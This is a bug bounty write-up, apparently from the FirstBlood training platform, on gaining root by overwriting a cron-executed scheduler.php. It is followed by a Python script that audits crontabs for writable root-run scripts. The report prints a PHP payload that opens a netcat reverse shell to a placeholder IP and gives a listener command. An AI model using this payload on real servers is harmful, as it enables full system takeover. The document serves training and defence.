FirstBlood-#681: Root access on the web server
This issue was discovered on FirstBlood v2



On 2021-10-27, shivam18u Level 3 reported:

Hi sean,

I found a way to get root access to the server.

I have mentioned the steps to get RCE with fb-exec account access. With that access we can further get root access.

https://www.bugbountyhunter.com/hackevents/report?id=633

After getting the fb-exec access, you can see the /app/docker/crontab file.

The crontab runs the scheduler.php file with root access every minute.

So, if we edit the scheduler.php file, we can get a reverse shell to our VPS.

We can echo PHP code that uses the system function to run the required command into scheduler.php.

echo '<?php system("nc IP ADDRESS -e /bin/sh");?>' > scheduler.php

After editing the file, start a listener on your VPS.

nc -nvlp 7070

You will get a connection within a minute. You can check the user.

Have a nice day!!

P1 CRITICAL

Endpoint: .

Parameter: .

Payload: .


FirstBlood ID: 35
Vulnerability Type: RCE

A cron job is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the FirstBlood PHP pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.
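
The misconfiguration described above (a root cron job executing a file that a lower-privileged account can modify) can be audited for. The following is an added example, not part of the report or of FirstBlood's code: it scans crontab text and reports every script path that an account outside a trusted set could alter or replace. The function names, the trusted-UID set and the sample crontab line are assumptions made for illustration, and every entry is assumed to run as root.

```python
import os
import stat

def writable_by_untrusted(path, trusted_uids=frozenset({0})):
    """Return reasons why an account outside trusted_uids can alter path."""
    reasons = []
    # Check the file itself, then its immediate directory: a writable
    # directory lets the file be renamed away and replaced.
    for target in (path, os.path.dirname(path) or "/"):
        st = os.stat(target)
        if st.st_uid not in trusted_uids:
            reasons.append(f"{target}: owned by uid {st.st_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append(f"{target}: group/world writable "
                           f"({stat.filemode(st.st_mode)})")
    return reasons

def audit_crontab(text, trusted_uids=frozenset({0})):
    """Map each existing absolute file path in a cron command to findings."""
    findings = {}
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank line, comment, or VAR=value assignment
        # Skip the schedule: one field for @hourly-style entries, else five.
        skip = 1 if fields[0].startswith("@") else 5
        for token in fields[skip:]:
            # A user field such as "root" is ignored: it is not a path.
            if token.startswith("/") and os.path.isfile(token):
                reasons = writable_by_untrusted(token, trusted_uids)
                if reasons:
                    findings[token] = reasons
    return findings

if __name__ == "__main__":
    import tempfile
    # Constructed stand-in for the scheduler script; not the real server layout.
    d = tempfile.mkdtemp()
    script = os.path.join(d, "scheduler.php")
    with open(script, "w") as fh:
        fh.write("<?php // scheduled job ?>")
    os.chmod(script, 0o666)  # the weak setting: anyone can rewrite the job
    sample = f"* * * * * php {script}\n"  # constructed crontab line
    for path, why in audit_crontab(sample, frozenset({0, os.getuid()})).items():
        print(path, *why, sep="\n  ")
```

On a real host, leave the trusted set at its default of UID 0 so that a script owned by a service account such as the PHP pool user is reported; the fix is to make the script and its directory owned by root and not writable by group or others.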